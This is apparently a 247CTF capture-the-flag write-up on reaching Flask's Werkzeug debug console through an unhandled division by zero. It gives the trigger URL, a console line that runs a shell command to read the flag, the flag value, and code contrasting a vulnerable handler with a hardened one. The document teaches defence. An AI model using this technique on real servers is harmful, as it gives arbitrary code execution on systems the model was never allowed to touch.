247CTF - Try And Catch

Find a bug and trigger an exception in a Flask web application to access the debug console.

Vulnerability

Flask's debug mode wraps the application in Werkzeug's DebuggedApplication with evalex=True, so any unhandled exception renders an interactive traceback page in which every stack frame offers a Python console. The calculator endpoint accepts a division operation and has no exception handling, so an unhandled ZeroDivisionError is enough to reach that console.

Solution

Step 1: Trigger an Exception

Send a division-by-zero request to the calculator (the operator is URL-encoded as %2f):

https://9894a61910fb83f2.247ctf.com/calculator?number_1=1&number_2=0&operation=%2f

Step 2: Execute Arbitrary Python

The response is the Werkzeug debugger traceback page. Open the console on any frame and read the flag with an OS command:

>>> __import__('os').popen('cat ./flag.txt').read()
'247CTF{0e310979093ef6309adcbcb418145200}\n'
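The two halves of the bug, the missing exception handling and the exploit request, side by side. This is an added example, not the challenge's source code: the challenge's handler is not shown on the page, so calculate_unhandled is my reconstruction of a handler that lets ZeroDivisionError escape, calculate_safe is the hardened form, and trigger_url rebuilds the request from Step 1 with stdlib URL encoding.

```python
import operator
from urllib.parse import urlencode

# Allowlisted operators; anything else is rejected by the safe version.
OPS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
}


def calculate_unhandled(number_1, number_2, op):
    """Reconstruction of the vulnerable pattern (assumption, not the challenge code).

    Nothing catches ZeroDivisionError or ValueError here, so under Flask debug
    mode the exception propagates to Werkzeug's DebuggedApplication, which
    renders the traceback page with an evalex console on every frame.
    """
    return OPS[op](float(number_1), float(number_2))


def calculate_safe(number_1, number_2, op):
    """Hardened handler: every failure becomes a plain error result.

    Even with debug mode off this matters; an unhandled exception still leaks
    a 500 and a server-side traceback in the logs.
    """
    if op not in OPS:
        return {"ok": False, "error": "unsupported operation"}
    try:
        a, b = float(number_1), float(number_2)
    except ValueError:
        return {"ok": False, "error": "operands must be numeric"}
    try:
        return {"ok": True, "result": OPS[op](a, b)}
    except ZeroDivisionError:
        return {"ok": False, "error": "division by zero"}


def escapes_handler(number_1, number_2, op):
    """True when the vulnerable handler would raise, i.e. reach the debugger."""
    try:
        calculate_unhandled(number_1, number_2, op)
    except (ZeroDivisionError, ValueError, KeyError):
        return True
    return False


def trigger_url(base, number_1, number_2, op):
    """Build the Step 1 request; urlencode turns '/' into %2F like the page's %2f."""
    query = urlencode({"number_1": number_1, "number_2": number_2, "operation": op})
    return f"{base}/calculator?{query}"


if __name__ == "__main__":
    base = "https://9894a61910fb83f2.247ctf.com"
    print(trigger_url(base, 1, 0, "/"))
    print("vulnerable handler raises:", escapes_handler(1, 0, "/"))
    print("hardened handler returns:", calculate_safe(1, 0, "/"))
```

The fix that actually closes the hole is running without debug mode (app.run(debug=False), and never exporting FLASK_DEBUG=1 in production); the try/except in calculate_safe is defence in depth so that a stray exception never becomes a traceback page in the first place.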

Key Insight

Never enable Flask debug mode in production. The Werkzeug debugger with evalex=True is a full interactive Python console on every traceback frame, giving anyone who can trigger an exception arbitrary code execution with the web server's privileges. Recent Werkzeug versions protect the console with a PIN printed to the server's stdout at startup, but that only helps if the PIN has not been disabled (WERKZEUG_DEBUG_PIN=off) or leaked, and it does nothing to stop the traceback page itself from exposing source code and local variables.

247CTF{0e310979093ef6309adcbcb418145200}